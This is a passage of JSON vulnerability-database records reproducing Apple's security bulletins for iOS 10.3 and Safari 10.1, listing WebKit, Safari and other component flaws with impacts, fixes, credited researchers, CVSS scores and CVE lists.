lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved 
memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. 
for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", 
"CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:37", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS 
Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. 
This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite 
v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. 
This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu 
Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. 
for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:51:42", "title": "About the security content of Safari 10.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2395", "CVE-2017-2444", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2017-08-29T02:51:42", "id": "APPLE:HT207600", "href": 
"https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T11:42:41", "description": "# About the security content of Safari 10.1\n\nThis document describes the security content of Safari 10.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google 
Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. 
This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with 
